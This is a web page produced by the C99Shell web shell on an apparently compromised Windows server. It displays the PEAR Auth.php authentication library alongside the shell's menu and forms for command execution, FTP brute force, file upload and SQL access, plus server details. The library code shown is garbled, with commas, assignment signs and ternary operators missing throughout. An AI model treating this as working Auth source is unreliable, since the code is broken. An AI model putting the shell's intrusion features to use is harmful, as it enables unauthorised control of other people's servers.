!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\dmz\php\pear\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Auth.php (38.4 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4 foldmethod=marker: */

/**
 * The main include file for Auth package
 *
 * PHP versions 4 and 5
 *
 * LICENSE: This source file is subject to version 3.01 of the PHP license
 * that is available through the world-wide-web at the following URI:
 * http://www.php.net/license/3_01.txt.  If you did not receive a copy of
 * the PHP License and are unable to obtain it through the web, please
 * send a note to license@php.net so we can mail you a copy immediately.
 *
 * @category   Authentication
 * @package    Auth
 * @author     Martin Jansen <mj@php.net>
 * @author     Adam Ashley <aashley@php.net>
 * @copyright  2001-2006 The PHP Group
 * @license    http://www.php.net/license/3_01.txt  PHP License 3.01
 * @version    CVS: $Id: Auth.php 289651 2009-10-15 04:39:07Z aashley $
 * @link       http://pear.php.net/package/Auth
 */

/**
 * Returned if session exceeds idle time
 */
define('AUTH_IDLED',                    -1);
/**
 * Returned if session has expired
 */
define('AUTH_EXPIRED',                  -2);
/**
 * Returned if container is unable to authenticate user/password pair
 */
define('AUTH_WRONG_LOGIN',              -3);
/**
 * Returned if a container method is not supported.
 */
define('AUTH_METHOD_NOT_SUPPORTED',     -4);
/**
 * Returned if new Advanced security system detects a breach
 */
define('AUTH_SECURITY_BREACH',          -5);
/**
 * Returned if checkAuthCallback says session should not continue.
 */
define('AUTH_CALLBACK_ABORT',           -6);

/**
 * Auth Log level - INFO
 */
define('AUTH_LOG_INFO',     6);
/**
 * Auth Log level - DEBUG
 */
define('AUTH_LOG_DEBUG',    7);

/**
 * Auth Advanced Security - IP Checks
 */
define('AUTH_ADV_IPCHECK'1);
/**
 * Auth Advanced Security - User Agent Checks
 */
define('AUTH_ADV_USERAGENT'2);
/**
 * Auth Advanced Security - Challenge Response
 */
define('AUTH_ADV_CHALLENGE'3);


/**
 * PEAR::Auth
 *
 * The PEAR::Auth class provides methods for creating an
 * authentication system using PHP.
 *
 * @category   Authentication
 * @package    Auth
 * @author     Martin Jansen <mj@php.net>
 * @author     Adam Ashley <aashley@php.net>
 * @copyright  2001-2006 The PHP Group
 * @license    http://www.php.net/license/3_01.txt  PHP License 3.01
 * @version    Release: @package_version@  File: $Revision: 289651 $
 * @link       http://pear.php.net/package/Auth
 */
class Auth {

    
// {{{ properties

    /**
     * Auth lifetime in seconds
     *
     * If this variable is set to 0, auth never expires
     *
     * @var  integer
     * @see  setExpire(), checkAuth()
     */
    
var $expire 0;

    
/**
     * Has the auth session expired?
     *
     * @var   bool
     * @see   checkAuth()
     */
    
var $expired false;

    
/**
     * Maximum idletime in seconds
     *
     * The difference to $expire is, that the idletime gets
     * refreshed each time checkAuth() is called. If this
     * variable is set to 0, idletime is never checked.
     *
     * @var integer
     * @see setIdle(), checkAuth()
     */
    
var $idle 0;

    
/**
     * Is the maximum idletime over?
     *
     * @var boolean
     * @see checkAuth()
     */
    
var $idled false;

    
/**
     * Storage object
     *
     * @var object
     * @see Auth(), validateLogin()
     */
    
var $storage '';

    
/**
     * User-defined function that creates the login screen
     *
     * @var string
     */
    
var $loginFunction '';

    
/**
     * Should the login form be displayed
     *
     * @var   bool
     * @see   setShowlogin()
     */
    
var $showLogin true;

    
/**
      * Is Login Allowed from this page
      *
      * @var  bool
      * @see setAllowLogin
      */
    
var $allowLogin true;

    
/**
     * Current authentication status
     *
     * @var string
     */
    
var $status '';

    
/**
     * Username
     *
     * @var string
     */
    
var $username '';

    
/**
     * Password
     *
     * @var string
     */
    
var $password '';

    
/**
     * checkAuth callback function name
     *
     * @var string
     * @see setCheckAuthCallback()
     */
    
var $checkAuthCallback '';

    
/**
     * Login callback function name
     *
     * @var string
     * @see setLoginCallback()
     */
    
var $loginCallback '';

    
/**
     * Failed Login callback function name
     *
     * @var string
     * @see setFailedLoginCallback()
     */
    
var $loginFailedCallback '';

    
/**
     * Logout callback function name
     *
     * @var string
     * @see setLogoutCallback()
     */
    
var $logoutCallback '';

    
/**
     * Auth session-array name
     *
     * @var string
     */
    
var $_sessionName '_authsession';

    
/**
     * Package Version
     *
     * @var string
     */
    
var $version "@version@";

    
/**
     * Flag to use advanced security
     * When set extra checks will be made to see if the
     * user's IP or useragent have changed across requests.
     * Turned off by default to preserve BC.
     *
     * @var mixed Boolean to turn all advanced security options on or off
     *            Array containing named values turning specific advanced
     *            security features on or off individually
     *              array(
     *                  AUTH_ADV_IPCHECK    => true,
     *                  AUTH_ADV_USERAGENT  => true,
     *                  AUTH_ADV_CHALLENGE  => true,
     *              );
     */
    
var $advancedsecurity false;

    
/**
     * Username key in POST array
     *
     * @var string
     */
    
var $_postUsername 'username';

    
/**
     * Password key in POST array
     *
     * @var string
     */
    
var $_postPassword 'password';

    
/**
     * Holds a reference to the session auth variable
     * @var array
     */
    
var $session;

    
/**
     * Holds a reference to the global server variable
     * @var array
     */
    
var $server;

    
/**
     * Holds a reference to the global post variable
     * @var array
     */
    
var $post;

    
/**
     * Holds a reference to the global cookie variable
     * @var array
     */
    
var $cookie;

    
/**
     * A hash to hold various superglobals as reference
     * @var array
     */
    
var $authdata;

    
/**
      * How many times has checkAuth been called
      * @var int
      */
    
var $authChecks 0;

    
/**
     * PEAR::Log object
     *
     * @var object Log
     */
    
var $logger null;

    
/**
     * Whether to enable logging of behaviour
     *
     * @var boolean
     */
    
var $enableLogging false;

    
/**
     * Whether to regenerate session id everytime start is called
     *
     * @var boolean
     */
    
var $regenerateSessionId false;

    
// }}}
    // {{{ Auth() [constructor]

    /**
     * Constructor
     *
     * Set up the storage driver.
     *
     * @param string    Type of the storage driver
     * @param mixed     Additional options for the storage driver
     *                  (example: if you are using DB as the storage
     *                   driver, you have to pass the dsn string here)
     *
     * @param string    Name of the function that creates the login form
     * @param boolean   Should the login form be displayed if necessary?
     * @return void
     */
    
function Auth($storageDriver$options ''$loginFunction ''$showLogin true)
    {
        
$this->applyAuthOptions($options);

        
// Start the session suppress error if already started
        
if(!session_id()){
            @
session_start();
            if(!
session_id()) {
                
// Throw error
                
include_once 'PEAR.php';
                
PEAR::throwError('Session could not be started by Auth, '
                        
.'possibly headers are already sent, try putting '
                        
.'ob_start in the beginning of your script');
            }
        }

        
// Make Sure Auth session variable is there
        
if(!isset($_SESSION[$this->_sessionName])) {
            
$_SESSION[$this->_sessionName] = array();
        }

        
// Assign Some globals to internal references, this will replace _importGlobalVariable
        
$this->session =& $_SESSION[$this->_sessionName];
        
$this->server =& $_SERVER;
        
$this->post =& $_POST;
        
$this->cookie =& $_COOKIE;

        if (
$loginFunction != '' && is_callable($loginFunction)) {
            
$this->loginFunction $loginFunction;
        }

        if (
is_bool($showLogin)) {
            
$this->showLogin $showLogin;
        }

        if (
is_object($storageDriver)) {
            
$this->storage =& $storageDriver;
            
// Pass a reference to auth to the container, ugly but works
            // this is used by the DB container to use method setAuthData not staticaly.
            
$this->storage->_auth_obj =& $this;
        } else {
            
// $this->storage = $this->_factory($storageDriver, $options);
            //
            
$this->storage_driver $storageDriver;
            
$this->storage_options =& $options;
        }
    }

    
// }}}
    // {{{ applyAuthOptions()

    /**
      * Set the Auth options
      *
      * Some options which are Auth specific will be applied
      * the rest will be left for usage by the container
      *
      * @param array    An array of Auth options
      * @return array   The options which were not applied
      * @access private
      */
    
function &applyAuthOptions(&$options)
    {
        if(
is_array($options)){
            if (!empty(
$options['sessionName'])) {
                
$this->_sessionName $options['sessionName'];
                unset(
$options['sessionName']);
            }
            if (isset(
$options['allowLogin'])) {
                
$this->allowLogin $options['allowLogin'];
                unset(
$options['allowLogin']);
            }
            if (!empty(
$options['postUsername'])) {
                
$this->_postUsername $options['postUsername'];
                unset(
$options['postUsername']);
            }
            if (!empty(
$options['postPassword'])) {
                
$this->_postPassword $options['postPassword'];
                unset(
$options['postPassword']);
            }
            if (isset(
$options['advancedsecurity'])) {
                
$this->advancedsecurity $options['advancedsecurity'];
                unset(
$options['advancedsecurity']);
            }
            if (isset(
$options['enableLogging'])) {
                
$this->enableLogging $options['enableLogging'];
                unset(
$options['enableLogging']);
            }
            if (isset(
$options['regenerateSessionId']) && is_bool($options['regenerateSessionId'])) {
                
$this->regenerateSessionId $options['regenerateSessionId'];
            }
        }
        return(
$options);
    }

    
// }}}
    // {{{ _loadStorage()

    /**
      * Load Storage Driver if not already loaded
      *
      * Suspend storage instantiation to make Auth lighter to use
      * for calls which do not require login
      *
      * @return bool    True if the conainer is loaded, false if the container
      *                 is already loaded
      * @access private
      */
    
function _loadStorage()
    {
        if(!
is_object($this->storage)) {
            
$this->storage =& $this->_factory($this->storage_driver,
                    
$this->storage_options);
            
$this->storage->_auth_obj =& $this;
            
$this->log('Loaded storage container ('.$this->storage_driver.')'AUTH_LOG_DEBUG);
            return(
true);
        }
        return(
false);
    }

    
// }}}
    // {{{ _factory()

    /**
     * Return a storage driver based on $driver and $options
     *
     * @static
     * @param  string $driver  Type of storage class to return
     * @param  string $options Optional parameters for the storage class
     * @return object Object   Storage object
     * @access private
     */
    
function &_factory($driver$options '')
    {
        
$storage_class 'Auth_Container_' $driver;
        include_once 
'Auth/Container/' $driver '.php';
        
$obj =& new $storage_class($options);
        return 
$obj;
    }

    
// }}}
    // {{{ assignData()

    /**
     * Assign data from login form to internal values
     *
     * This function takes the values for username and password
     * from $HTTP_POST_VARS/$_POST and assigns them to internal variables.
     * If you wish to use another source apart from $HTTP_POST_VARS/$_POST,
     * you have to derive this function.
     *
     * @global $HTTP_POST_VARS, $_POST
     * @see    Auth
     * @return void
     * @access private
     */
    
function assignData()
    {
        
$this->log('Auth::assignData() called.'AUTH_LOG_DEBUG);

        if (   isset(
$this->post[$this->_postUsername])
            && 
$this->post[$this->_postUsername] != '') {
            
$this->username = (get_magic_quotes_gpc() == 1
                    
stripslashes($this->post[$this->_postUsername])
                    : 
$this->post[$this->_postUsername]);
        }
        if (   isset(
$this->post[$this->_postPassword])
            && 
$this->post[$this->_postPassword] != '') {
            
$this->password = (get_magic_quotes_gpc() == 1
                    
stripslashes($this->post[$this->_postPassword])
                    : 
$this->post[$this->_postPassword] );
        }
    }

    
// }}}
    // {{{ start()

    /**
     * Start new auth session
     *
     * @return void
     * @access public
     */
    
function start()
    {
        
$this->log('Auth::start() called.'AUTH_LOG_DEBUG);

        
// #10729 - Regenerate session id here if we are generating it on every
        //          page load.
        
if ($this->regenerateSessionId) {
            
session_regenerate_id(true);
        }

        
$this->assignData();
        if (!
$this->checkAuth() && $this->allowLogin) {
            
$this->login();
        }
    }

    
// }}}
    // {{{ login()

    /**
     * Login function
     *
     * @return void
     * @access private
     */
    
function login()
    {
        
$this->log('Auth::login() called.'AUTH_LOG_DEBUG);

        
$login_ok false;
        
$this->_loadStorage();

        
// Check if using challenge response
        
(isset($this->post['authsecret']) && $this->post['authsecret'] == 1)
            ? 
$usingChap true
            
$usingChap false;


        
// When the user has already entered a username, we have to validate it.
        
if (!empty($this->username)) {
            if (
true === $this->storage->fetchData($this->username$this->password$usingChap)) {
                
$this->session['challengekey'] = md5($this->username.$this->password);
                
$login_ok true;
                
$this->log('Successful login.'AUTH_LOG_INFO);
            }
        }

        if (!empty(
$this->username) && $login_ok) {
            
$this->setAuth($this->username);
            if (
is_callable($this->loginCallback)) {
                
$this->log('Calling loginCallback ('.$this->loginCallback.').'AUTH_LOG_DEBUG);
                
call_user_func_array($this->loginCallback, array($this->username, &$this));
            }
        }

        
// If the login failed or the user entered no username,
        // output the login screen again.
        
if (!empty($this->username) && !$login_ok) {
            
$this->log('Incorrect login.'AUTH_LOG_INFO);
            
$this->status AUTH_WRONG_LOGIN;
            if (
is_callable($this->loginFailedCallback)) {
                
$this->log('Calling loginFailedCallback ('.$this->loginFailedCallback.').'AUTH_LOG_DEBUG);
                
call_user_func_array($this->loginFailedCallback, array($this->username, &$this));
            }
        }

        if ((empty(
$this->username) || !$login_ok) && $this->showLogin) {
            
$this->log('Rendering Login Form.'AUTH_LOG_INFO);
            if (
is_callable($this->loginFunction)) {
                
$this->log('Calling loginFunction ('.$this->loginFunction.').'AUTH_LOG_DEBUG);
                
call_user_func_array($this->loginFunction, array($this->username$this->status, &$this));
            } else {
                
// BC fix Auth used to use drawLogin for this
                // call is sub classes implement this
                
if (is_callable(array($this'drawLogin'))) {
                    
$this->log('Calling Auth::drawLogin()'AUTH_LOG_DEBUG);
                    return 
$this->drawLogin($this->username$this);
                }

                
$this->log('Using default Auth_Frontend_Html'AUTH_LOG_DEBUG);

                
// New Login form
                
include_once 'Auth/Frontend/Html.php';
                return 
Auth_Frontend_Html::render($this$this->username);
            }
        } else {
            return;
        }
    }

    
// }}}
    // {{{ setExpire()

    /**
     * Set the maximum expire time
     *
     * @param  integer time in seconds
     * @param  bool    add time to current expire time or not
     * @return void
     * @access public
     */
    
function setExpire($time$add false)
    {
        
$add $this->expire += $time $this->expire $time;
    }

    
// }}}
    // {{{ setIdle()

    /**
     * Set the maximum idle time
     *
     * @param  integer time in seconds
     * @param  bool    add time to current maximum idle time or not
     * @return void
     * @access public
     */
    
function setIdle($time$add false)
    {
        
$add $this->idle += $time $this->idle $time;
    }

    
// }}}
    // {{{ setSessionName()

    /**
     * Set name of the session to a customized value.
     *
     * If you are using multiple instances of PEAR::Auth
     * on the same domain, you can change the name of
     * session per application via this function.
     * This will chnage the name of the session variable
     * auth uses to store it's data in the session
     *
     * @param  string New name for the session
     * @return void
     * @access public
     */
    
function setSessionName($name 'session')
    {
        
$this->_sessionName '_auth_'.$name;
        
// Make Sure Auth session variable is there
        
if(!isset($_SESSION[$this->_sessionName])) {
            
$_SESSION[$this->_sessionName] = array();
        }
        
$this->session =& $_SESSION[$this->_sessionName];
    }

    
// }}}
    // {{{ setShowLogin()

    /**
     * Should the login form be displayed if necessary?
     *
     * @param  bool    show login form or not
     * @return void
     * @access public
     */
    
function setShowLogin($showLogin true)
    {
        
$this->showLogin $showLogin;
    }

    
// }}}
    // {{{ setAllowLogin()

    /**
     * Is Login Allowed from this page?
     *
     * @param  bool    allow login from this page or not
     * @return void
     * @access public
     */
    
function setAllowLogin($allowLogin true)
    {
        
$this->allowLogin $allowLogin;
    }

    
// }}}
    // {{{ setCheckAuthCallback()

    /**
     * Register a callback function to be called whenever the validity of the login is checked
     * The function will receive two parameters, the username and a reference to the auth object.
     *
     * @param  string  callback function name
     * @return void
     * @access public
     * @since Method available since Release 1.4.3
     */
    
function setCheckAuthCallback($checkAuthCallback)
    {
        
$this->checkAuthCallback $checkAuthCallback;
    }

    
// }}}
    // {{{ setLoginCallback()

    /**
     * Register a callback function to be called on user login.
     * The function will receive two parameters, the username and a reference to the auth object.
     *
     * @param  string  callback function name
     * @return void
     * @see    setLogoutCallback()
     * @access public
     */
    
function setLoginCallback($loginCallback)
    {
        
$this->loginCallback $loginCallback;
    }

    
// }}}
    // {{{ setFailedLoginCallback()

    /**
     * Register a callback function to be called on failed user login.
     * The function will receive two parameters, the username and a reference to the auth object.
     *
     * @param  string  callback function name
     * @return void
     * @access public
     */
    
function setFailedLoginCallback($loginFailedCallback)
    {
        
$this->loginFailedCallback $loginFailedCallback;
    }

    
// }}}
    // {{{ setLogoutCallback()

    /**
     * Register a callback function to be called on user logout.
     * The function will receive three parameters, the username and a reference to the auth object.
     *
     * @param  string  callback function name
     * @return void
     * @see    setLoginCallback()
     * @access public
     */
    
function setLogoutCallback($logoutCallback)
    {
        
$this->logoutCallback $logoutCallback;
    }

    
// }}}
    // {{{ setAuthData()

    /**
     * Register additional information that is to be stored
     * in the session.
     *
     * @param  string  Name of the data field
     * @param  mixed   Value of the data field
     * @param  boolean Should existing data be overwritten? (default
     *                 is true)
     * @return void
     * @access public
     */
    
function setAuthData($name$value$overwrite true)
    {
        if (!empty(
$this->session['data'][$name]) && $overwrite == false) {
            return;
        }
        
$this->session['data'][$name] = $value;
    }

    
// }}}
    // {{{ getAuthData()

    /**
     * Get additional information that is stored in the session.
     *
     * If no value for the first parameter is passed, the method will
     * return all data that is currently stored.
     *
     * @param  string Name of the data field
     * @return mixed  Value of the data field.
     * @access public
     */
    
function getAuthData($name null)
    {
        if (!isset(
$this->session['data'])) {
            return 
null;
        }
        if(!isset(
$name)) {
            return 
$this->session['data'];
        }
        if (isset(
$name) && isset($this->session['data'][$name])) {
            return 
$this->session['data'][$name];
        }
        return 
null;
    }

    
// }}}
    // {{{ setAuth()

    /**
     * Register variable in a session telling that the user
     * has logged in successfully
     *
     * @param  string Username
     * @return void
     * @access public
     */
    
function setAuth($username)
    {
        
$this->log('Auth::setAuth() called.'AUTH_LOG_DEBUG);

        
// #10729 - Regenerate session id here only if generating at login only
        //          Don't do it if we are regenerating on every request so we don't
        //          regenerate it twice in one request.
        
if (!$this->regenerateSessionId) {
            
// #2021 - Change the session id to avoid session fixation attacks php 4.3.3 >
            
session_regenerate_id(true);
        }

        if (!isset(
$this->session) || !is_array($this->session)) {
            
$this->session = array();
        }

        if (!isset(
$this->session['data'])) {
            
$this->session['data'] = array();
        }

        
$this->session['sessionip'] = isset($this->server['REMOTE_ADDR'])
            ? 
$this->server['REMOTE_ADDR']
            : 
'';
        
$this->session['sessionuseragent'] = isset($this->server['HTTP_USER_AGENT'])
            ? 
$this->server['HTTP_USER_AGENT']
            : 
'';
        
$this->session['sessionforwardedfor'] = isset($this->server['HTTP_X_FORWARDED_FOR'])
            ? 
$this->server['HTTP_X_FORWARDED_FOR']
            : 
'';

        
// This should be set by the container to something more safe
        // Like md5(passwd.microtime)
        
if(empty($this->session['challengekey'])) {
            
$this->session['challengekey'] = md5($username.microtime());
        }

        
$this->session['challengecookie'] = md5($this->session['challengekey'].microtime());
        
setcookie('authchallenge'$this->session['challengecookie'], 0'/');

        
$this->session['registered'] = true;
        
$this->session['username']   = $username;
        
$this->session['timestamp']  = time();
        
$this->session['idle']       = time();
    }

    
// }}}
    // {{{ setAdvancedSecurity()

    /**
      * Enables advanced security checks
      *
      * Currently only ip change and useragent change
      * are detected
      * @todo Add challenge cookies - Create a cookie which changes every time
      *       and contains some challenge key which the server can verify with
      *       a session var cookie might need to be crypted (user pass)
      * @param bool Enable or disable
      * @return void
      * @access public
      */
    
function setAdvancedSecurity($flag=true)
    {
        
$this->advancedsecurity $flag;
    }

    
// }}}
    // {{{ checkAuth()

    /**
     * Checks if there is a session with valid auth information.
     *
     * @access public
     * @return boolean  Whether or not the user is authenticated.
     */
    
function checkAuth()
    {
        
$this->log('Auth::checkAuth() called.'AUTH_LOG_DEBUG);
        
$this->authChecks++;
        if (isset(
$this->session)) {
            
// Check if authentication session is expired
            
if (   $this->expire 0
                
&& isset($this->session['timestamp'])
                && (
$this->session['timestamp'] + $this->expire) < time()) {
                
$this->log('Session Expired'AUTH_LOG_INFO);
                
$this->expired true;
                
$this->status AUTH_EXPIRED;
                
$this->logout();
                return 
false;
            }

            
// Check if maximum idle time is reached
            
if (   $this->idle 0
                
&& isset($this->session['idle'])
                && (
$this->session['idle'] + $this->idle) < time()) {
                
$this->log('Session Idle Time Reached'AUTH_LOG_INFO);
                
$this->idled true;
                
$this->status AUTH_IDLED;
                
$this->logout();
                return 
false;
            }

            if (   isset(
$this->session['registered'])
                && isset(
$this->session['username'])
                && 
$this->session['registered'] == true
                
&& $this->session['username'] != '') {
                
Auth::updateIdle();

                if (
$this->_isAdvancedSecurityEnabled()) {
                    
$this->log('Advanced Security Mode Enabled.'AUTH_LOG_DEBUG);

                    
// Only Generate the challenge once
                    
if (   $this->authChecks == 1
                        
&& $this->_isAdvancedSecurityEnabled(AUTH_ADV_CHALLENGE)) {
                        
$this->log('Generating new Challenge Cookie.'AUTH_LOG_DEBUG);
                        
$this->session['challengecookieold'] = $this->session['challengecookie'];
                        
$this->session['challengecookie'] = md5($this->session['challengekey'].microtime());
                        
setcookie('authchallenge'$this->session['challengecookie'], 0'/');
                    }

                    
// Check for ip change
                    
if (   $this->_isAdvancedSecurityEnabled(AUTH_ADV_IPCHECK)
                        && isset(
$this->server['REMOTE_ADDR'])
                        && 
$this->session['sessionip'] != $this->server['REMOTE_ADDR']) {
                        
$this->log('Security Breach. Remote IP Address changed.'AUTH_LOG_INFO);
                        
// Check if the IP of the user has changed, if so we
                        // assume a man in the middle attack and log him out
                        
$this->expired true;
                        
$this->status AUTH_SECURITY_BREACH;
                        
$this->logout();
                        return 
false;
                    }

                    
// Check for ip change (if connected via proxy)
                    
if (   $this->_isAdvancedSecurityEnabled(AUTH_ADV_IPCHECK)
                        && isset(
$this->server['HTTP_X_FORWARDED_FOR'])
                        && 
$this->session['sessionforwardedfor'] != $this->server['HTTP_X_FORWARDED_FOR']) {
                        
$this->log('Security Breach. Forwarded For IP Address changed.'AUTH_LOG_INFO);
                        
// Check if the IP of the user connecting via proxy has
                        // changed, if so we assume a man in the middle attack
                        // and log him out.
                        
$this->expired true;
                        
$this->status AUTH_SECURITY_BREACH;
                        
$this->logout();
                        return 
false;
                    }

                    
// Check for useragent change
                    
if (   $this->_isAdvancedSecurityEnabled(AUTH_ADV_USERAGENT)
                        && isset(
$this->server['HTTP_USER_AGENT'])
                        && 
$this->session['sessionuseragent'] != $this->server['HTTP_USER_AGENT']) {
                        
$this->log('Security Breach. User Agent changed.'AUTH_LOG_INFO);
                        
// Check if the User-Agent of the user has changed, if
                        // so we assume a man in the middle attack and log him out
                        
$this->expired true;
                        
$this->status AUTH_SECURITY_BREACH;
                        
$this->logout();
                        return 
false;
                    }

                    
// Check challenge cookie here, if challengecookieold is not set
                    // this is the first time and check is skipped
                    // TODO when user open two pages similtaneuly (open in new window,open
                    // in tab) auth breach is caused find out a way around that if possible
                    
if (   $this->_isAdvancedSecurityEnabled(AUTH_ADV_CHALLENGE)
                        && isset(
$this->session['challengecookieold'])
                        && 
$this->session['challengecookieold'] != $this->cookie['authchallenge']) {
                        
$this->log('Security Breach. Challenge Cookie mismatch.'AUTH_LOG_INFO);
                        
$this->expired true;
                        
$this->status AUTH_SECURITY_BREACH;
                        
$this->logout();
                        
$this->login();
                        return 
false;
                    }
                }

                if (
is_callable($this->checkAuthCallback)) {
                    
$this->log('Calling checkAuthCallback ('.$this->checkAuthCallback.').'AUTH_LOG_DEBUG);
                    
$checkCallback call_user_func_array($this->checkAuthCallback, array($this->username, &$this));
                    if (
$checkCallback == false) {
                        
$this->log('checkAuthCallback failed.'AUTH_LOG_INFO);
                        
$this->expired true;
                        
$this->status AUTH_CALLBACK_ABORT;
                        
$this->logout();
                        return 
false;
                    }
                }

                
$this->log('Session OK.'AUTH_LOG_INFO);
                return 
true;
            }
        } else {
            
$this->log('Unable to locate session storage.'AUTH_LOG_DEBUG);
            return 
false;
        }
        
$this->log('No login session.'AUTH_LOG_DEBUG);
        return 
false;
    }

    
// }}}
    // {{{ staticCheckAuth() [static]

    /**
     * Statically checks if there is a session with valid auth information.
     *
     * @access public
     * @see checkAuth
     * @return boolean  Whether or not the user is authenticated.
     * @static
     */
    
function staticCheckAuth($options null)
    {
        static 
$staticAuth;
        if(!isset(
$staticAuth)) {
            
$staticAuth = new Auth('null'$options);
        }
        
$staticAuth->log('Auth::staticCheckAuth() called'AUTH_LOG_DEBUG);
        return 
$staticAuth->checkAuth();
    }

    
// }}}
    // {{{ getAuth()

    /**
     * Has the user been authenticated?
     *
     * Is there a valid login session. Previously this was different from
     * checkAuth() but now it is just an alias.
     *
     * @access public
     * @return bool  True if the user is logged in, otherwise false.
     */
    
function getAuth()
    {
        
$this->log('Auth::getAuth() called.'AUTH_LOG_DEBUG);
        return 
$this->checkAuth();
    }

    
// }}}
    // {{{ logout()

    /**
     * Logout function
     *
     * This function clears any auth tokens in the currently
     * active session and executes the logout callback function,
     * if any
     *
     * @access public
     * @return void
     */
    
function logout()
    {
        
$this->log('Auth::logout() called.'AUTH_LOG_DEBUG);

        if (
is_callable($this->logoutCallback) && isset($this->session['username'])) {
            
$this->log('Calling logoutCallback ('.$this->logoutCallback.').'AUTH_LOG_DEBUG);
            
call_user_func_array($this->logoutCallback, array($this->session['username'], &$this));
        }

        
$this->username '';
        
$this->password '';

        
$this->session null;
    }

    
// }}}
    // {{{ updateIdle()

    /**
     * Update the idletime
     *
     * @access private
     * @return void
     */
    
function updateIdle()
    {
        
$this->session['idle'] = time();
    }

    
// }}}
    // {{{ getUsername()

    /**
     * Get the username
     *
     * @return string
     * @access public
     */
    
function getUsername()
    {
        if (isset(
$this->session['username'])) {
            return(
$this->session['username']);
        }
        return(
'');
    }

    
// }}}
    // {{{ getStatus()

    /**
     * Get the current status
     *
     * @return string
     * @access public
     */
    
function getStatus()
    {
        return 
$this->status;
    }

    
// }}}
    // {{{ getPostUsernameField()

    /**
     * Gets the post varible used for the username
     *
     * @return string
     * @access public
     */
    
function getPostUsernameField()
    {
        return(
$this->_postUsername);
    }

    
// }}}
    // {{{ getPostPasswordField()

    /**
     * Gets the post varible used for the username
     *
     * @return string
     * @access public
     */
    
function getPostPasswordField()
    {
        return(
$this->_postPassword);
    }

    
// }}}
    // {{{ sessionValidThru()

    /**
     * Returns the time up to the session is valid
     *
     * @access public
     * @return integer
     */
    
function sessionValidThru()
    {
        if (!isset(
$this->session['idle'])) {
            return 
0;
        }
        if (
$this->idle == 0) {
            return 
0;
        }
        return (
$this->session['idle'] + $this->idle);
    }

    
// }}}
    // {{{ listUsers()

    /**
     * List all users that are currently available in the storage
     * container
     *
     * @access public
     * @return array
     */
    
function listUsers()
    {
        
$this->log('Auth::listUsers() called.'AUTH_LOG_DEBUG);
        
$this->_loadStorage();
        return 
$this->storage->listUsers();
    }

    
// }}}
    // {{{ addUser()

    /**
     * Add user to the storage container
     *
     * @access public
     * @param  string Username
     * @param  string Password
     * @param  mixed  Additional parameters
     * @return mixed  True on success, PEAR error object on error
     *                and AUTH_METHOD_NOT_SUPPORTED otherwise.
     */
    
function addUser($username$password$additional '')
    {
        
$this->log('Auth::addUser() called.'AUTH_LOG_DEBUG);
        
$this->_loadStorage();
        return 
$this->storage->addUser($username$password$additional);
    }

    
// }}}
    // {{{ removeUser()

    /**
     * Remove user from the storage container
     *
     * @access public
     * @param  string Username
     * @return mixed  True on success, PEAR error object on error
     *                and AUTH_METHOD_NOT_SUPPORTED otherwise.
     */
    
function removeUser($username)
    {
        
$this->log('Auth::removeUser() called.'AUTH_LOG_DEBUG);
        
$this->_loadStorage();
        return 
$this->storage->removeUser($username);
    }

    
// }}}
    // {{{ changePassword()

    /**
     * Change password for user in the storage container
     *
     * @access public
     * @param string Username
     * @param string The new password
     * @return mixed True on success, PEAR error object on error
     *               and AUTH_METHOD_NOT_SUPPORTED otherwise.
     */
    
function changePassword($username$password)
    {
        
$this->log('Auth::changePassword() called'AUTH_LOG_DEBUG);
        
$this->_loadStorage();
        return 
$this->storage->changePassword($username$password);
    }

    
// }}}
    // {{{ log()

    /**
     * Log a message from the Auth system
     *
     * @access public
     * @param string The message to log
     * @param string The log level to log the message under. See the Log documentation for more info.
     * @return boolean
     */
    
function log($message$level AUTH_LOG_DEBUG)
    {
        if (!
$this->enableLogging) return false;

        
$this->_loadLogger();

        
$this->logger->log('AUTH: '.$message$level);
    }

    
// }}}
    // {{{ _loadLogger()

    /**
      * Load Log object if not already loaded
      *
      * Suspend logger instantiation to make Auth lighter to use
      * for calls which do not require logging
      *
      * @return bool    True if the logger is loaded, false if the logger
      *                 is already loaded
      * @access private
      */
    
function _loadLogger()
    {
        if(
is_null($this->logger)) {
            if (!
class_exists('Log')) {
                include_once 
'Log.php';
            }
            
$this->logger =& Log::singleton('null',
                    
null,
                    
'auth['.getmypid().']',
                    array(),
                    
AUTH_LOG_DEBUG);
            return(
true);
        }
        return(
false);
    }

    
// }}}
    // {{{ attachLogObserver()

    /**
     * Attach an Observer to the Auth Log Source
     *
     * @param object Log_Observer A Log Observer instance
     * @return boolean
     */
    
function attachLogObserver(&$observer) {

        
$this->_loadLogger();

        return 
$this->logger->attach($observer);

    }

    
// }}}
    // {{{ _isAdvancedSecurityEnabled()

    /**
     * Is advanced security enabled?
     *
     * Pass one of the Advanced Security constants as the first parameter
     * to check if that advanced security check is enabled.
     *
     * @param integer
     * @return boolean
     */
    
function _isAdvancedSecurityEnabled($feature null) {

        if (
is_null($feature)) {

            if (
$this->advancedsecurity === true)
                return 
true;

            if (   
is_array($this->advancedsecurity)
                && 
in_array(true$this->advancedsecuritytrue))
                return 
true;

            return 
false;

        } else {

            if (
is_array($this->advancedsecurity)) {

                if (   isset(
$this->advancedsecurity[$feature])
                    && 
$this->advancedsecurity[$feature] == true)
                    return 
true;

                return 
false;

            }

            return (bool)
$this->advancedsecurity;

        }

    }

    
// }}}

}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--